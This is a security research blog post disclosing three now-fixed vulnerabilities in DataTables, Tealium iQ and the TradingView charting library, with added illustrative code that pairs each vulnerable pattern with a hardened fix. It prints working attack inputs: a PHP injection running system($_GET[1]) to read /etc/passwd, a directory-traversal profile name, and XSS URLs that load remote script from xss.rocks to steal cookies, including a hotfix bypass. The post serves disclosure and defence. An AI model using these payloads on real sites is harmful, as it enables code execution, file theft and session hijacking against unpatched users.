Vulnerability analysis: third-party JavaScript libraries that affect thousands of websites

Copyright: Creative Commons Attribution-ShareAlike (CC BY-SA). Others may build on this article, but derivative work must be distributed under the same license.


* The vulnerabilities discussed here have been reported to the vendors and fixed. This article is for technical research and discussion only; using it for any illegal purpose is strictly prohibited, and whoever does so bears all resulting consequences.

Many websites today embed third-party JavaScript libraries to add functionality or improve how the site is presented. Usually the library is loaded directly from the third-party provider's domain, which keeps the embedding site lean and easy to update. But a library embedded this way is also a dangerous attack surface: a flaw in the provider's service becomes a flaw in every site that includes the script, which makes those sites considerably more vulnerable than they appear.

This article discloses three vulnerabilities in currently popular third-party JavaScript libraries. Given their severity, the thousands of organisations whose sites embed these libraries may all be affected.

Vulnerability Example 1: Remote Code Execution (RCE) in datatables.net

DataTables (datatables.net) is a free library for displaying HTML tables. According to its official site, embedding the .js and .css files hosted on cdn.datatables.net into your page is all that is needed to render the enhanced tables.
In other words, a large number of websites include the .js or .css files from cdn.datatables.net as a shared library. If the library itself, or the service that produces it, has a vulnerability, every site that references those files may be affected.

In the following example, an Australian government website references the library file jquery.dataTables.min.js hosted on cdn.datatables.net:
[Screenshot]
Browsing the services on the datatables.net site shows the generator at https://editor.datatables.net/generator/. The browser-side script sends a request to this remote application, which builds and tests the HTML table definition on the server; for every request it generates a fresh table and returns a .php file to be deployed on the target site. The generator does not properly filter certain parameters before writing them into the generated .php file, so we can inject into the generated code and obtain a degree of remote code execution. For example, we can place an RCE payload in the PHP generation step marked with the red box below:
[Screenshot]
We then change the value passed through $_GET[1] from 1 to cat /etc/passwd and see what happens:
[Screenshot]
As a result, the /etc/passwd file of the datatables.net server is read and returned directly. Further testing showed that the same vulnerability can be used to read other sensitive files on cdn.datatables.net. RCE plus arbitrary file read on a third-party library provider leaves a lot to the imagination, and given how many websites embed these library files, the potential impact is alarming.
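The generator's own source is not shown in this article, so the following is an added illustration rather than DataTables' code: a toy PHP code generator, modelled loosely on the Editor PHP syntax Field::inst('name'), that interpolates user-supplied column names into the PHP it emits. It shows why a name containing a quote turns the generator into a code-injection primitive, and how restricting names to bare identifiers closes it. The attacker input, the function names and the generated template are all constructed here.

```javascript
// Added illustration (not DataTables' generator source): a toy PHP code
// generator modelled loosely on the Editor PHP syntax Field::inst('name'),
// showing how an unfiltered field name becomes code in the emitted file.

// Only plain PHP identifiers may appear inside the emitted string literals.
const PHP_IDENTIFIER = /^[A-Za-z_][A-Za-z0-9_]*$/;

// Naive generator: the user-supplied table and column names are
// interpolated straight into the PHP source it writes out.
function generateEditorPhpNaive(table, fields) {
  const fieldLines = fields
    .map((name) => `    Field::inst( '${name}' ),`)
    .join("\n");
  return [
    "<?php",
    `Editor::inst( $db, '${table}' )`,
    "  ->fields(",
    fieldLines,
    "  )",
    "  ->process( $_POST )",
    "  ->json();",
  ].join("\n");
}

// Hardened generator: reject any name that is not a bare identifier, so a
// quote, parenthesis or PHP statement can never reach the generated file.
function generateEditorPhpSafe(table, fields) {
  for (const name of [table, ...fields]) {
    if (!PHP_IDENTIFIER.test(name)) {
      throw new Error(`rejected name: ${JSON.stringify(name)}`);
    }
  }
  return generateEditorPhpNaive(table, fields);
}

// Constructed attacker input: closes the quoted name and the Field::inst()
// call, then adds a second "field" whose name is the output of a shell
// command taken from GET parameter 1, as in the /etc/passwd read above.
// The emitted line stays syntactically valid PHP:
//   Field::inst( 'x' ), Field::inst( system($_GET[1]) . '' ),
const MALICIOUS_FIELD = "x' ), Field::inst( system($_GET[1]) . '";

// Check: does the generated PHP now contain a system() call on $_GET[1]?
function containsSystemCall(phpSource) {
  return /system\(\$_GET\[1\]\)/.test(phpSource);
}

// Runs both generators on the same input and reports what happened.
function demo() {
  const injected = generateEditorPhpNaive("users", ["first_name", MALICIOUS_FIELD]);
  let safeRejected = false;
  try {
    generateEditorPhpSafe("users", ["first_name", MALICIOUS_FIELD]);
  } catch (e) {
    safeRejected = true;
  }
  return { injected: containsSystemCall(injected), safeRejected };
}
```

The point of the hardened version is that validation happens on the input before any template is filled; escaping quotes inside the template would be the weaker alternative, because it has to be repeated correctly at every interpolation point.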

Vulnerability Example 2: Path Traversal in Tealium iQ

Tealium iQ is a tag management solution: the company provides a single tag for managing a business's marketing and data tags, so that one Tealium iQ tag replaces all the individual tags on a site and gives central control over the online marketing setup. For example, Uber's website embeds the Tealium iQ tag service:
[Screenshot]
The tag requests the Tealium iQ .js library file from tags.tiqcdn.com, at a path that contains the customer's account name and profile name:

https://tags.tiqcdn.com/utag///prod/utag.js

The vulnerability is that the Tealium iQ tag service does not properly handle the profile name (Profile Name) a customer enters when configuring a site: the remote service allows the two special characters / and . in the profile name.

These two characters can be used to manipulate the directory the profile's configuration file is loaded from. For example, if the profile name is ../../utag/uber/main, the JavaScript published for that profile is uploaded to tags.tiqcdn.com under a path that resolves to https://tags.tiqcdn.com/utag/uber/main/prod/utag.js, so it is embedded in every Uber page that uses Tealium iQ.

This vulnerability was reported through the Uber bug bounty program and other bug bounty platforms. I wrote the following simple code, which can modify arbitrary .js files on tags.tiqcdn.com, i.e. a directory traversal on tags.tiqcdn.com:
[Screenshot]
This vulnerability could affect most of the websites of Uber, Microsoft, Cisco and Intel.
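The following is an added illustration, not Tealium's code: a small model of a CDN that publishes each customer's tag at /utag/account/profile/environment/utag.js, with a naive publisher that trusts the profile name beside a hardened one that validates every segment and confirms the resolved path stays under the customer's own account directory. The account name "attacker" and the function names are assumptions; the traversal profile name and the resulting Uber path are the ones given above.

```javascript
// Added illustration of the Tealium-style profile-name traversal (not
// Tealium's code). The CDN publishes a customer's tag at
// /utag/<account>/<profile>/<environment>/utag.js; "." and "/" in the
// profile name let the attacker's JS land on another customer's path.

// Minimal POSIX-style normalisation: collapses "." and ".." the way a
// filesystem or CDN origin does when it resolves the publish path.
function normalizePath(p) {
  const out = [];
  for (const seg of p.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") {
      out.pop();
      continue;
    }
    out.push(seg);
  }
  return "/" + out.join("/");
}

// Naive publisher: trusts the profile name and joins it into the path.
function publishPathNaive(account, profile, env) {
  return normalizePath(`/utag/${account}/${profile}/${env}/utag.js`);
}

// Each path segment must be a plain name: no slash, no dot, no encoding tricks.
const SEGMENT = /^[A-Za-z0-9_-]+$/;

// Hardened publisher: validate every segment, then (as a second, independent
// check) require the normalised result to lie under this account's prefix.
function publishPathSafe(account, profile, env) {
  for (const s of [account, profile, env]) {
    if (!SEGMENT.test(s)) {
      throw new Error(`invalid path segment: ${JSON.stringify(s)}`);
    }
  }
  const resolved = normalizePath(`/utag/${account}/${profile}/${env}/utag.js`);
  const prefix = `/utag/${account}/`;
  if (!resolved.startsWith(prefix)) {
    throw new Error(`publish path ${resolved} escaped ${prefix}`);
  }
  return resolved;
}

// Constructed attacker input: a profile created in the attacker's own
// account whose name climbs out of that account and into Uber's.
const ATTACKER_PROFILE = "../../utag/uber/main";

// Returns true when the naive publisher would overwrite another account's file.
function escapesAccount(account, profile, env) {
  return !publishPathNaive(account, profile, env).startsWith(`/utag/${account}/`);
}
```

The prefix check in publishPathSafe is deliberately kept even though the segment regex already rejects the traversal: if the validation rule is ever loosened (for example to allow dots in profile names), the containment check still stops the publish from leaving the account directory.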

Vulnerability Example 3: DOM Based XSS in the TradingView Charting Library

TradingView provides a popular charting service that is widely used on financial and cryptocurrency trading platforms; most cryptocurrency exchanges use its charting library to display live trading data. On 24 September 2018, security researcher Victor Zhu found a high-severity DOM based XSS vulnerability in TradingView that affects every cryptocurrency site embedding its library files.

Every site that embeds the TradingView library exposes a publicly accessible file of the form tv-chart.html. This HTML file initialises the trading chart from the parameters in location.hash; once the chart is initialised, it is loaded into the page through an iframe pointing at a URL like the following:

https://example.com/tradingview/en-tv-chart.x.html#symbol=BTC_ETH&interval=180&widgetbar=%7B%22details%22%3Afalse%2C%22watchlist%22%3Afalse%2C%22watchlist_settings%22%3A%7B%22default_symbols%22%3A%5B%5D%7D%7D&drawingsAccess=%7B%22type%22%3A%22black%22%7D&locale=en&uid=tradingview_36472&clientId=tradingview.com&userId=public_user&chartsStorageVer=1.0&debug=false&timezone=Asia%2FTaipei&theme=Dark

The vulnerability lies in the function that loads a third-party indicator file into the chart: it takes a link from the indicatorsFile parameter in the target site's URL fragment and passes it straight to $.getScript():

D ? $.getScript(urlParams.indicatorsFile).done(function() {…})

[Screenshot]
So by injecting a link to a remote .js file into that parameter, arbitrary script can be executed for malicious purposes, for example:

https://example.com/tradingview/en-tv-chart.x.html#disabledFeatures=[]&enabledFeatures=[]&indicatorsFile=//xss.rocks/xss.js

When a user opens this link, the page loads and executes the remote xss.rocks/xss.js, which reads the user's cookies:
[Screenshot]
After the vulnerability was disclosed, TradingView released a new version of the library file as a hotfix, replacing the function responsible for loading the third-party indicator file with a modified version:
[Screenshot]
However, the vulnerability still exists after this fix: by adding a uid=urlParams parameter, the customIndicatorsUrl parameter can be used to reproduce it. The final payload is:

https://example.com/tradingview/en-tv-chart.x.html#disabledFeatures=[]&enabledFeatures=[]&customIndicatorsUrl=//xss.rocks/xss.js&uid=urlParams
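The following is an added illustration of the loader pattern behind both payloads, not TradingView's own code (the hotfix shown in the screenshot is not reproduced). It parses location.hash into parameters, shows how the vulnerable loader resolves a protocol-relative value such as //xss.rocks/xss.js to an attacker origin, and beside it a hardened resolver that validates the resulting URL rather than the parameter name, so neither indicatorsFile nor customIndicatorsUrl nor a uid=urlParams switch can change the outcome. The parameter names are taken from the payloads above; the page URL and function names are constructed.

```javascript
// Added illustration of the tv-chart.html style loader, not TradingView's
// own code. Parameter names indicatorsFile, customIndicatorsUrl and uid are
// taken from the payloads above; everything else here is constructed.

// Parses "#a=1&b=2" into an object; malformed percent-encoding is skipped.
function parseHashParams(hash) {
  const params = {};
  for (const pair of hash.replace(/^#/, "").split("&")) {
    if (!pair) continue;
    const i = pair.indexOf("=");
    const key = i < 0 ? pair : pair.slice(0, i);
    const value = i < 0 ? "" : pair.slice(i + 1);
    try {
      params[decodeURIComponent(key)] = decodeURIComponent(value);
    } catch (e) {
      // bad encoding in this pair: ignore it rather than abort the parse
    }
  }
  return params;
}

// Either parameter name may carry the script location.
function pickIndicatorsParam(params) {
  return params.customIndicatorsUrl || params.indicatorsFile || null;
}

// Vulnerable pattern: the fragment value reaches the script loader as-is.
// A protocol-relative "//xss.rocks/xss.js" resolves to an attacker origin,
// and $.getScript() would run it inside the page. Returns the URL that
// would be fetched so the effect is visible without a browser.
function indicatorsScriptVulnerable(hash, pageUrl) {
  const raw = pickIndicatorsParam(parseHashParams(hash));
  return raw === null ? null : new URL(raw, pageUrl).href;
}

// Hardened pattern: resolve the value against the page URL, then require
// the result to be same-origin and inside the chart's own directory.
// Returns null (load nothing) for anything else.
function indicatorsScriptSafe(hash, pageUrl) {
  const raw = pickIndicatorsParam(parseHashParams(hash));
  if (raw === null) return null;
  const page = new URL(pageUrl);
  const allowedDir = new URL("./", page).pathname; // e.g. /tradingview/
  let target;
  try {
    target = new URL(raw, page); // also normalises ".." segments
  } catch (e) {
    return null;
  }
  if (target.origin !== page.origin) return null;
  if (!target.pathname.startsWith(allowedDir)) return null;
  return target.href;
}
```

Checking the resolved URL's origin is what matters here: blocking "http://" and "https://" prefixes would still let "//host/x.js" through, and an allowlist of parameter names is what the uid=urlParams bypass defeated.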

TradingView then repaired the library once more and finally closed the hole completely. However, many cryptocurrency trading platforms still have the vulnerable file in their deployments. After testing all current cryptocurrency trading platforms, more than 90 of them, including CoinMarketCap and some of the larger-volume exchanges, were found to still have the DOM based XSS vulnerability in their TradingView library. All of these platforms were promptly notified, with the following outcome:

46 platforms ignored the vulnerability report;

44 platforms replied and asked for the technical details;

19 platforms eventually fixed the vulnerability;

7 platforms decided to award a bounty for it.

Summary

As security testers, when assessing the security of a web application we should also consider the third-party products and components it uses; they are just as critical. And as website operators, we must be careful about embedding third-party library files.


Source: https://blog.csdn.net/kclax/article/details/93631001